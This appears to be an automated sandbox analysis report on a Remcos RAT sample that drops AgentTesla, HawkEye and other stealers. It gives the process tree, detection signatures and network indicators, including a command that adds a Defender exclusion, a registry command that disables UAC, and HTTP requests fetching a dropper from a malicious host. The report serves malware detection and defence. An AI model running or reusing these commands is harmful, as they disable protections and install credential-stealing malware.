Windows Analysis Report xxTzyGLZx5.exe

Overview

General Information

Sample Name: xxTzyGLZx5.exe
Analysis ID: 535501
MD5: d5f570694f0847caea18ccac8837b052
SHA1: b509737bb61ae0e9dee56ca2706456b3788ce553
SHA256: ea209f6ba95920038ac83985be8bcffc1fda49631ed3142cfdd9f2acd52584b1
Tags: exe, RAT, RemcosRAT

Detection

Remcos AgentTesla AveMaria HawkEye MailPassView SpyEx UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Yara detected AgentTesla
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Yara detected SpyEx stealer
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Sigma detected: Suspicious Script Execution From Temp Folder
Connects to many ports of the same IP (likely port scanning)
Uses cmd line tools excessively to alter registry or file data
Contains functionality to steal Firefox passwords or cookies
Writes or reads registry keys via WMI
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Sigma detected: WScript or CScript Dropper
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Installs a global keyboard hook
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Increases the number of concurrent connection per server for Internet Explorer
.NET source code references suspicious native API functions
Delayed program exit found
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Hides user accounts
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Contains functionality to steal Chrome passwords or cookies
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
Spawns drivers
PE file contains more sections than normal
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)

Process Tree

  • System is w10x64
  • xxTzyGLZx5.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\xxTzyGLZx5.exe" MD5: D5F570694F0847CAEA18CCAC8837B052)
    • xxTzyGLZx5.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\xxTzyGLZx5.exe" MD5: D5F570694F0847CAEA18CCAC8837B052)
      • bin.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\bin.exe" 0 MD5: 805FBB84293E86F25B566A5B2C2815D2)
        • powershell.exe (PID: 6324 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5984 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rem9090sta.exe (PID: 7136 cmdline: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0 MD5: 083D4CDE33E6721F595A468BB7D17ADA)
        • cmd.exe (PID: 7156 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6204 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • wscript.exe (PID: 3740 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6620 cmdline: C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • remcos.exe (PID: 3228 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 083D4CDE33E6721F595A468BB7D17ADA)
  • remcos.exe (PID: 4200 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • cmd.exe (PID: 6076 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 7092 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • remcos.exe (PID: 3228 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • remcos.exe (PID: 7100 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • remcos.exe (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
    • dwn.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Roaming\Remcos\dwn.exe" MD5: 32EB10C12A29B38F13730CD1F5DCAD4D)
      • 21.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\21.exe" 0 MD5: 6C9447A6F1B04C75D95594338AE61E06)
        • 21.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\Temp\21.exe" 0 MD5: 6C9447A6F1B04C75D95594338AE61E06)
      • 5.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Local\Temp\5.exe" 0 MD5: 3F332B62EEE0970F3189C689D5BD042A)
        • 5.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\5.exe" 0 MD5: 3F332B62EEE0970F3189C689D5BD042A)
          • Windows Update.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
            • Windows Update.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
              • dw20.exe (PID: 5276 cmdline: dw20.exe -x -s 2132 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
              • vbc.exe (PID: 980 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
              • vbc.exe (PID: 2932 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • 4.exe (PID: 6140 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" 0 MD5: 78EDE0254C66FA9E667E4CEB88754E1C)
        • 4.exe (PID: 1260 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" 0 MD5: 78EDE0254C66FA9E667E4CEB88754E1C)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • bin.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\bin.exe" MD5: 805FBB84293E86F25B566A5B2C2815D2)
  • remcos.exe (PID: 6416 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: 083D4CDE33E6721F595A468BB7D17ADA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\bin.exe | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\bin.exe | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x191f0:$c1: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\bin.exe | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x144e8:$a1: \Opera Software\Opera Stable\Login Data
  • 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Temp\bin.exe | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
C:\Users\user\AppData\Local\Temp\bin.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000030.00000000.890118500.0000000000400000.00000040.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
40.1.5.exe.41ce65.1.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
2.2.xxTzyGLZx5.exe.4031bf.1.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x17ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
2.2.xxTzyGLZx5.exe.4031bf.1.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x17ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x17ff0:$c1: Elevation:Administrator!new:
2.2.xxTzyGLZx5.exe.4031bf.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x138e8:$a1: \Opera Software\Opera Stable\Login Data
  • 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
2.2.xxTzyGLZx5.exe.4031bf.1.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started, Author: Florian Roth, Max Altgelt, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, ParentProcessId: 7136, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 3740
Sigma detected: WScript or CScript Dropper
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, ParentProcessId: 7136, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 3740
Sigma detected: Powershell Defender Exclusion
Source: Process started, Author: Florian Roth, Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\bin.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\bin.exe, ParentProcessId: 7116, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 6324
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\bin.exe" 0, ParentImage: C:\Users\user\AppData\Local\Temp\bin.exe, ParentProcessId: 7116, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 6324
Sigma detected: Group Modification Logging
Source: Event Logs, Author: Alexandr Yampolskyi, SOC Prime, Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132833543238841154.6324.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bin.exe, Avira: detection malicious, Label: TR/Redcap.ghjpt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted file
Source: xxTzyGLZx5.exe, Virustotal: Detection: 30%
Yara detected Remcos RAT
Source: Yara match, File source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rem9090sta.exe PID: 7136, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: remcos.exe PID: 4200, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
Yara detected AveMaria stealer
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 25%Perma Link
                    Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 46%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeReversingLabs: Detection: 75%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\4.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\5.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_0042F31F CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_0042F31F
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits:

                    Yara detected UACMe UAC Bypass tool

                    Compliance:

                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\AppData\Local\Temp\5.exe | Unpacked PE file: 40.2.5.exe.4970000.15.unpack
                    Source: C:\Users\user\AppData\Local\Temp\4.exe | Unpacked PE file: 41.2.4.exe.2520000.4.unpack
                    Source: xxTzyGLZx5.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: C:\Users\user\AppData\Local\Temp\5.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: unknown | HTTPS traffic detected: 81.88.52.165:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe | Directory created: C:\Program Files\Microsoft DN1
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
                    Source: Binary string: wntdll.pdbUGP source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp
                    Source: Binary string: wuser32.pdb source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: wuser32.pdbUGP source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00406AEE SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,4_2_00406AEE
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user\AppData
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\AppData\Local\Temp\21.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe | Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe | Code function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe | Code function: 1_2_00402630 FindFirstFileA,1_2_00402630
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_0040A047 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040A047
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00418144 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,4_2_00418144
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_0040A262 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040A262
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00406360 FindFirstFileW,FindNextFileW,4_2_00406360
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_0040783D __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0040783D
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00407C95 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00407C95
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00447D49 FindFirstFileExA,4_2_00447D49
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe | Code function: 4_2_00415DC8 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00415DC8

                    Networking:

                    Connects to many ports of the same IP (likely port scanning)
                    Source: global traffic | TCP traffic: 185.157.161.174 ports 1,1975,9090,5,7,9
                    May check the online IP address of the machine
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | DNS query: name: whatismyipaddress.com
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: whatismyipaddress.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: hotmarzz.eu
                    Source: global traffic | HTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: hotmarzz.eu | Connection: Keep-Alive
                    Source: global traffic | TCP traffic: 192.168.2.4:49726 -> 185.157.161.174:1975
                    Source: global traffic | TCP traffic: 192.168.2.4:49767 -> 66.29.159.53:587
                    Source: remcos.exe, 0000000D.00000002.938448176.0000000002987000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.752833518.000000000295A000.00000004.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp, bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706451948.0000000000D34000.00000004.00000001.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exe
                    Source: bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exeOZ
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exeW
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpString found in binary or memory: http://hotmarzz.eu/goods/Droppertodownloa.exem
                    Source: xxTzyGLZx5.exe, xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
